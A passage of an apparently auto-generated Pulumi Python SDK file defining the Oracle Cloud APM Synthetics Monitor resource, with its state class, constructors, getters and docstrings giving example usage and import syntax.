                 monitor_type: Optional[pulumi.Input[str]] = None,
                 repeat_interval_in_seconds: Optional[pulumi.Input[int]] = None,
                 script_id: Optional[pulumi.Input[str]] = None,
                 script_name: Optional[pulumi.Input[str]] = None,
                 script_parameters: Optional[pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 target: Optional[pulumi.Input[str]] = None,
                 time_created: Optional[pulumi.Input[str]] = None,
                 time_updated: Optional[pulumi.Input[str]] = None,
                 timeout_in_seconds: Optional[pulumi.Input[int]] = None,
                 vantage_point_count: Optional[pulumi.Input[int]] = None,
                 vantage_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        Input properties used for looking up and filtering Monitor resources.
        :param pulumi.Input[str] apm_domain_id: (Updatable) The APM domain ID the request is intended for.
        :param pulumi.Input['MonitorConfigurationArgs'] configuration: (Updatable) Details of monitor configuration.
        :param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
        :param pulumi.Input[str] display_name: (Updatable) Unique name that can be edited. The name should not contain any confidential information.
        :param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
        :param pulumi.Input[str] monitor_type: Type of monitor.
        :param pulumi.Input[int] repeat_interval_in_seconds: (Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
        :param pulumi.Input[str] script_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
        :param pulumi.Input[str] script_name: Name of the script.
        :param pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]] script_parameters: (Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
        :param pulumi.Input[str] status: (Updatable) Enables or disables the monitor.
        :param pulumi.Input[str] target: (Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
        :param pulumi.Input[str] time_created: The time the resource was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-12T22:47:12.613Z`
        :param pulumi.Input[str] time_updated: The time the resource was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-13T22:47:12.613Z`
        :param pulumi.Input[int] timeout_in_seconds: (Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds time for monitors. Also, timeoutInSeconds should be a multiple of 60. Monitor will be allowed to run only for timeoutInSeconds time. It would be terminated after that.
        :param pulumi.Input[int] vantage_point_count: Number of vantage points where monitor is running.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] vantage_points: (Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
        """
        if apm_domain_id is not None:
            pulumi.set(__self__, "apm_domain_id", apm_domain_id)
        if configuration is not None:
            pulumi.set(__self__, "configuration", configuration)
        if defined_tags is not None:
            pulumi.set(__self__, "defined_tags", defined_tags)
        if display_name is not None:
            pulumi.set(__self__, "display_name", display_name)
        if freeform_tags is not None:
            pulumi.set(__self__, "freeform_tags", freeform_tags)
        if monitor_type is not None:
            pulumi.set(__self__, "monitor_type", monitor_type)
        if repeat_interval_in_seconds is not None:
            pulumi.set(__self__, "repeat_interval_in_seconds", repeat_interval_in_seconds)
        if script_id is not None:
            pulumi.set(__self__, "script_id", script_id)
        if script_name is not None:
            pulumi.set(__self__, "script_name", script_name)
        if script_parameters is not None:
            pulumi.set(__self__, "script_parameters", script_parameters)
        if status is not None:
            pulumi.set(__self__, "status", status)
        if target is not None:
            pulumi.set(__self__, "target", target)
        if time_created is not None:
            pulumi.set(__self__, "time_created", time_created)
        if time_updated is not None:
            pulumi.set(__self__, "time_updated", time_updated)
        if timeout_in_seconds is not None:
            pulumi.set(__self__, "timeout_in_seconds", timeout_in_seconds)
        if vantage_point_count is not None:
            pulumi.set(__self__, "vantage_point_count", vantage_point_count)
        if vantage_points is not None:
            pulumi.set(__self__, "vantage_points", vantage_points)

    @property
    @pulumi.getter(name="apmDomainId")
    def apm_domain_id(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The APM domain ID the request is intended for.
        """
        return pulumi.get(self, "apm_domain_id")

    @apm_domain_id.setter
    def apm_domain_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "apm_domain_id", value)

    @property
    @pulumi.getter
    def configuration(self) -> Optional[pulumi.Input['MonitorConfigurationArgs']]:
        """
        (Updatable) Details of monitor configuration.
        """
        return pulumi.get(self, "configuration")

    @configuration.setter
    def configuration(self, value: Optional[pulumi.Input['MonitorConfigurationArgs']]):
        pulumi.set(self, "configuration", value)

    @property
    @pulumi.getter(name="definedTags")
    def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
        """
        return pulumi.get(self, "defined_tags")

    @defined_tags.setter
    def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "defined_tags", value)

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) Unique name that can be edited. The name should not contain any confidential information.
        """
        return pulumi.get(self, "display_name")

    @display_name.setter
    def display_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", value)

    @property
    @pulumi.getter(name="freeformTags")
    def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
        """
        return pulumi.get(self, "freeform_tags")

    @freeform_tags.setter
    def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "freeform_tags", value)

    @property
    @pulumi.getter(name="monitorType")
    def monitor_type(self) -> Optional[pulumi.Input[str]]:
        """
        Type of monitor.
        """
        return pulumi.get(self, "monitor_type")

    @monitor_type.setter
    def monitor_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "monitor_type", value)

    @property
    @pulumi.getter(name="repeatIntervalInSeconds")
    def repeat_interval_in_seconds(self) -> Optional[pulumi.Input[int]]:
        """
        (Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
        """
        return pulumi.get(self, "repeat_interval_in_seconds")

    @repeat_interval_in_seconds.setter
    def repeat_interval_in_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "repeat_interval_in_seconds", value)

    @property
    @pulumi.getter(name="scriptId")
    def script_id(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
        """
        return pulumi.get(self, "script_id")

    @script_id.setter
    def script_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "script_id", value)

    @property
    @pulumi.getter(name="scriptName")
    def script_name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the script.
        """
        return pulumi.get(self, "script_name")

    @script_name.setter
    def script_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "script_name", value)

    @property
    @pulumi.getter(name="scriptParameters")
    def script_parameters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]]]:
        """
        (Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
        """
        return pulumi.get(self, "script_parameters")

    @script_parameters.setter
    def script_parameters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]]]):
        pulumi.set(self, "script_parameters", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) Enables or disables the monitor.
        """
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter
    def target(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
        """
        return pulumi.get(self, "target")

    @target.setter
    def target(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target", value)

    @property
    @pulumi.getter(name="timeCreated")
    def time_created(self) -> Optional[pulumi.Input[str]]:
        """
        The time the resource was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-12T22:47:12.613Z`
        """
        return pulumi.get(self, "time_created")

    @time_created.setter
    def time_created(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_created", value)

    @property
    @pulumi.getter(name="timeUpdated")
    def time_updated(self) -> Optional[pulumi.Input[str]]:
        """
        The time the resource was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-13T22:47:12.613Z`
        """
        return pulumi.get(self, "time_updated")

    @time_updated.setter
    def time_updated(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_updated", value)

    @property
    @pulumi.getter(name="timeoutInSeconds")
    def timeout_in_seconds(self) -> Optional[pulumi.Input[int]]:
        """
        (Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds time for monitors. Also, timeoutInSeconds should be a multiple of 60. Monitor will be allowed to run only for timeoutInSeconds time. It would be terminated after that.
        """
        return pulumi.get(self, "timeout_in_seconds")

    @timeout_in_seconds.setter
    def timeout_in_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "timeout_in_seconds", value)

    @property
    @pulumi.getter(name="vantagePointCount")
    def vantage_point_count(self) -> Optional[pulumi.Input[int]]:
        """
        Number of vantage points where monitor is running.
        """
        return pulumi.get(self, "vantage_point_count")

    @vantage_point_count.setter
    def vantage_point_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "vantage_point_count", value)

    @property
    @pulumi.getter(name="vantagePoints")
    def vantage_points(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        (Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
        """
        return pulumi.get(self, "vantage_points")

    @vantage_points.setter
    def vantage_points(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "vantage_points", value)
class Monitor(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
apm_domain_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[pulumi.InputType['MonitorConfigurationArgs']]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
monitor_type: Optional[pulumi.Input[str]] = None,
repeat_interval_in_seconds: Optional[pulumi.Input[int]] = None,
script_id: Optional[pulumi.Input[str]] = None,
script_name: Optional[pulumi.Input[str]] = None,
script_parameters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MonitorScriptParameterArgs']]]]] = None,
status: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None,
timeout_in_seconds: Optional[pulumi.Input[int]] = None,
vantage_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
This resource provides the Monitor resource in Oracle Cloud Infrastructure Apm Synthetics service.
Creates a new monitor.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_monitor = oci.apmsynthetics.Monitor("testMonitor",
apm_domain_id=oci_apm_synthetics_apm_domain["test_apm_domain"]["id"],
display_name=var["monitor_display_name"],
monitor_type=var["monitor_monitor_type"],
repeat_interval_in_seconds=var["monitor_repeat_interval_in_seconds"],
vantage_points=var["monitor_vantage_points"],
configuration=oci.apmsynthetics.MonitorConfigurationArgs(
config_type=var["monitor_configuration_config_type"],
is_certificate_validation_enabled=var["monitor_configuration_is_certificate_validation_enabled"],
is_failure_retried=var["monitor_configuration_is_failure_retried"],
is_redirection_enabled=var["monitor_configuration_is_redirection_enabled"],
req_authentication_details=oci.apmsynthetics.MonitorConfigurationReqAuthenticationDetailsArgs(
auth_headers=[oci.apmsynthetics.MonitorConfigurationReqAuthenticationDetailsAuthHeaderArgs(
header_name=var["monitor_configuration_req_authentication_details_auth_headers_header_name"],
header_value=var["monitor_configuration_req_authentication_details_auth_headers_header_value"],
)],
auth_request_method=var["monitor_configuration_req_authentication_details_auth_request_method"],
auth_request_post_body=var["monitor_configuration_req_authentication_details_auth_request_post_body"],
auth_token=var["monitor_configuration_req_authentication_details_auth_token"],
auth_url=var["monitor_configuration_req_authentication_details_auth_url"],
auth_user_name=oci_identity_user["test_user"]["name"],
auth_user_password=var["monitor_configuration_req_authentication_details_auth_user_password"],
oauth_scheme=var["monitor_configuration_req_authentication_details_oauth_scheme"],
),
req_authentication_scheme=var["monitor_configuration_req_authentication_scheme"],
request_headers=[oci.apmsynthetics.MonitorConfigurationRequestHeaderArgs(
header_name=var["monitor_configuration_request_headers_header_name"],
header_value=var["monitor_configuration_request_headers_header_value"],
)],
request_method=var["monitor_configuration_request_method"],
request_post_body=var["monitor_configuration_request_post_body"],
request_query_params=[oci.apmsynthetics.MonitorConfigurationRequestQueryParamArgs(
param_name=var["monitor_configuration_request_query_params_param_name"],
param_value=var["monitor_configuration_request_query_params_param_value"],
)],
verify_response_codes=var["monitor_configuration_verify_response_codes"],
verify_response_content=var["monitor_configuration_verify_response_content"],
verify_texts=[oci.apmsynthetics.MonitorConfigurationVerifyTextArgs(
text=var["monitor_configuration_verify_texts_text"],
)],
),
defined_tags={
"foo-namespace.bar-key": "value",
},
freeform_tags={
"bar-key": "value",
},
script_id=oci_apm_synthetics_script["test_script"]["id"],
script_parameters=[oci.apmsynthetics.MonitorScriptParameterArgs(
param_name=var["monitor_script_parameters_param_name"],
param_value=var["monitor_script_parameters_param_value"],
)],
status=var["monitor_status"],
target=var["monitor_target"],
timeout_in_seconds=var["monitor_timeout_in_seconds"])
```
## Import
Monitors can be imported using the `id`, e.g.
```sh
$ pulumi import oci:apmsynthetics/monitor:Monitor test_monitor "monitors/{monitorId}/apmDomainId/{apmDomainId}"
```
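The composite import ID shown above can also be assembled programmatically. A minimal sketch (the `monitor_import_id` helper is hypothetical and not part of this SDK):
```python
def monitor_import_id(monitor_id: str, apm_domain_id: str) -> str:
    # Hypothetical helper: builds the composite ID in the documented
    # "monitors/{monitorId}/apmDomainId/{apmDomainId}" format.
    return f"monitors/{monitor_id}/apmDomainId/{apm_domain_id}"
```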
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] apm_domain_id: (Updatable) The APM domain ID the request is intended for.
:param pulumi.Input[pulumi.InputType['MonitorConfigurationArgs']] configuration: (Updatable) Details of monitor configuration.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] display_name: (Updatable) Unique name that can be edited. The name should not contain any confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[str] monitor_type: Type of monitor.
:param pulumi.Input[int] repeat_interval_in_seconds: (Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
:param pulumi.Input[str] script_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
:param pulumi.Input[str] script_name: Name of the script.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MonitorScriptParameterArgs']]]] script_parameters: (Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
:param pulumi.Input[str] status: (Updatable) Enables or disables the monitor.
:param pulumi.Input[str] target: (Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
:param pulumi.Input[int] timeout_in_seconds: (Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds for monitors. Also, timeoutInSeconds should be a multiple of 60. The monitor is allowed to run only for timeoutInSeconds and is terminated after that.
:param pulumi.Input[Sequence[pulumi.Input[str]]] vantage_points: (Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
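As an illustration of the timeout and interval constraints described above, a client-side pre-check could look like the following (the `is_valid_timeout` helper is a hypothetical sketch, not part of this SDK):
```python
def is_valid_timeout(timeout_in_seconds: int, repeat_interval_in_seconds: int) -> bool:
    # Hypothetical sketch of the documented rules: timeoutInSeconds must be
    # a multiple of 60 and no more than 30% of repeatIntervalInSeconds.
    if timeout_in_seconds % 60 != 0:
        return False
    return timeout_in_seconds <= 0.3 * repeat_interval_in_seconds
```
With the minimum 300-second repeat interval, only a 60-second timeout satisfies both checks.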
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MonitorArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Monitor resource in Oracle Cloud Infrastructure Apm Synthetics service.
Creates a new monitor.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_monitor = oci.apmsynthetics.Monitor("testMonitor",
apm_domain_id=oci_apm_synthetics_apm_domain["test_apm_domain"]["id"],
display_name=var["monitor_display_name"],
monitor_type=var["monitor_monitor_type"],
repeat_interval_in_seconds=var["monitor_repeat_interval_in_seconds"],
vantage_points=var["monitor_vantage_points"],
configuration=oci.apmsynthetics.MonitorConfigurationArgs(
config_type=var["monitor_configuration_config_type"],
is_certificate_validation_enabled=var["monitor_configuration_is_certificate_validation_enabled"],
is_failure_retried=var["monitor_configuration_is_failure_retried"],
is_redirection_enabled=var["monitor_configuration_is_redirection_enabled"],
req_authentication_details=oci.apmsynthetics.MonitorConfigurationReqAuthenticationDetailsArgs(
auth_headers=[oci.apmsynthetics.MonitorConfigurationReqAuthenticationDetailsAuthHeaderArgs(
header_name=var["monitor_configuration_req_authentication_details_auth_headers_header_name"],
header_value=var["monitor_configuration_req_authentication_details_auth_headers_header_value"],
)],
auth_request_method=var["monitor_configuration_req_authentication_details_auth_request_method"],
auth_request_post_body=var["monitor_configuration_req_authentication_details_auth_request_post_body"],
auth_token=var["monitor_configuration_req_authentication_details_auth_token"],
auth_url=var["monitor_configuration_req_authentication_details_auth_url"],
auth_user_name=oci_identity_user["test_user"]["name"],
auth_user_password=var["monitor_configuration_req_authentication_details_auth_user_password"],
oauth_scheme=var["monitor_configuration_req_authentication_details_oauth_scheme"],
),
req_authentication_scheme=var["monitor_configuration_req_authentication_scheme"],
request_headers=[oci.apmsynthetics.MonitorConfigurationRequestHeaderArgs(
header_name=var["monitor_configuration_request_headers_header_name"],
header_value=var["monitor_configuration_request_headers_header_value"],
)],
request_method=var["monitor_configuration_request_method"],
request_post_body=var["monitor_configuration_request_post_body"],
request_query_params=[oci.apmsynthetics.MonitorConfigurationRequestQueryParamArgs(
param_name=var["monitor_configuration_request_query_params_param_name"],
param_value=var["monitor_configuration_request_query_params_param_value"],
)],
verify_response_codes=var["monitor_configuration_verify_response_codes"],
verify_response_content=var["monitor_configuration_verify_response_content"],
verify_texts=[oci.apmsynthetics.MonitorConfigurationVerifyTextArgs(
text=var["monitor_configuration_verify_texts_text"],
)],
),
defined_tags={
"foo-namespace.bar-key": "value",
},
freeform_tags={
"bar-key": "value",
},
script_id=oci_apm_synthetics_script["test_script"]["id"],
script_parameters=[oci.apmsynthetics.MonitorScriptParameterArgs(
param_name=var["monitor_script_parameters_param_name"],
param_value=var["monitor_script_parameters_param_value"],
)],
status=var["monitor_status"],
target=var["monitor_target"],
timeout_in_seconds=var["monitor_timeout_in_seconds"])
```
## Import
Monitors can be imported using the `id`, e.g.
```sh
$ pulumi import oci:apmsynthetics/monitor:Monitor test_monitor "monitors/{monitorId}/apmDomainId/{apmDomainId}"
```
:param str resource_name: The name of the resource.
:param MonitorArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MonitorArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
apm_domain_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[pulumi.InputType['MonitorConfigurationArgs']]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
monitor_type: Optional[pulumi.Input[str]] = None,
repeat_interval_in_seconds: Optional[pulumi.Input[int]] = None,
script_id: Optional[pulumi.Input[str]] = None,
script_name: Optional[pulumi.Input[str]] = None,
script_parameters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MonitorScriptParameterArgs']]]]] = None,
status: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None,
timeout_in_seconds: Optional[pulumi.Input[int]] = None,
vantage_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MonitorArgs.__new__(MonitorArgs)
if apm_domain_id is None and not opts.urn:
raise TypeError("Missing required property 'apm_domain_id'")
__props__.__dict__["apm_domain_id"] = apm_domain_id
__props__.__dict__["configuration"] = configuration
__props__.__dict__["defined_tags"] = defined_tags
if display_name is None and not opts.urn:
raise TypeError("Missing required property 'display_name'")
__props__.__dict__["display_name"] = display_name
__props__.__dict__["freeform_tags"] = freeform_tags
if monitor_type is None and not opts.urn:
raise TypeError("Missing required property 'monitor_type'")
__props__.__dict__["monitor_type"] = monitor_type
if repeat_interval_in_seconds is None and not opts.urn:
raise TypeError("Missing required property 'repeat_interval_in_seconds'")
__props__.__dict__["repeat_interval_in_seconds"] = repeat_interval_in_seconds
__props__.__dict__["script_id"] = script_id
__props__.__dict__["script_name"] = script_name
__props__.__dict__["script_parameters"] = script_parameters
__props__.__dict__["status"] = status
__props__.__dict__["target"] = target
__props__.__dict__["timeout_in_seconds"] = timeout_in_seconds
if vantage_points is None and not opts.urn:
raise TypeError("Missing required property 'vantage_points'")
__props__.__dict__["vantage_points"] = vantage_points
__props__.__dict__["time_created"] = None
__props__.__dict__["time_updated"] = None
__props__.__dict__["vantage_point_count"] = None
super(Monitor, __self__).__init__(
'oci:apmsynthetics/monitor:Monitor',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
apm_domain_id: Optional[pulumi.Input[str]] = None,
configuration: Optional[pulumi.Input[pulumi.InputType['MonitorConfigurationArgs']]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
monitor_type: Optional[pulumi.Input[str]] = None,
repeat_interval_in_seconds: Optional[pulumi.Input[int]] = None,
script_id: Optional[pulumi.Input[str]] = None,
script_name: Optional[pulumi.Input[str]] = None,
script_parameters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MonitorScriptParameterArgs']]]]] = None,
status: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None,
timeout_in_seconds: Optional[pulumi.Input[int]] = None,
vantage_point_count: Optional[pulumi.Input[int]] = None,
vantage_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'Monitor':
"""
Get an existing Monitor resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] apm_domain_id: (Updatable) The APM domain ID the request is intended for.
:param pulumi.Input[pulumi.InputType['MonitorConfigurationArgs']] configuration: (Updatable) Details of monitor configuration.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] display_name: (Updatable) Unique name that can be edited. The name should not contain any confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[str] monitor_type: Type of monitor.
:param pulumi.Input[int] repeat_interval_in_seconds: (Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
:param pulumi.Input[str] script_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
:param pulumi.Input[str] script_name: Name of the script.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MonitorScriptParameterArgs']]]] script_parameters: (Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
:param pulumi.Input[str] status: (Updatable) Enables or disables the monitor.
:param pulumi.Input[str] target: (Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
:param pulumi.Input[str] time_created: The time the resource was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-12T22:47:12.613Z`
:param pulumi.Input[str] time_updated: The time the resource was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2020-02-13T22:47:12.613Z`
:param pulumi.Input[int] timeout_in_seconds: (Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds for monitors. Also, timeoutInSeconds should be a multiple of 60. The monitor is allowed to run only for timeoutInSeconds and is terminated after that.
:param pulumi.Input[int] vantage_point_count: Number of vantage points where monitor is running.
:param pulumi.Input[Sequence[pulumi.Input[str]]] vantage_points: (Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MonitorState.__new__(_MonitorState)
__props__.__dict__["apm_domain_id"] = apm_domain_id
__props__.__dict__["configuration"] = configuration
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["monitor_type"] = monitor_type
__props__.__dict__["repeat_interval_in_seconds"] = repeat_interval_in_seconds
__props__.__dict__["script_id"] = script_id
__props__.__dict__["script_name"] = script_name
__props__.__dict__["script_parameters"] = script_parameters
__props__.__dict__["status"] = status
__props__.__dict__["target"] = target
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_updated"] = time_updated
__props__.__dict__["timeout_in_seconds"] = timeout_in_seconds
__props__.__dict__["vantage_point_count"] = vantage_point_count
__props__.__dict__["vantage_points"] = vantage_points
return Monitor(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apmDomainId")
def apm_domain_id(self) -> pulumi.Output[str]:
"""
(Updatable) The APM domain ID the request is intended for.
"""
return pulumi.get(self, "apm_domain_id")
@property
@pulumi.getter
def configuration(self) -> pulumi.Output['outputs.MonitorConfiguration']:
"""
(Updatable) Details of monitor configuration.
"""
return pulumi.get(self, "configuration")
@property
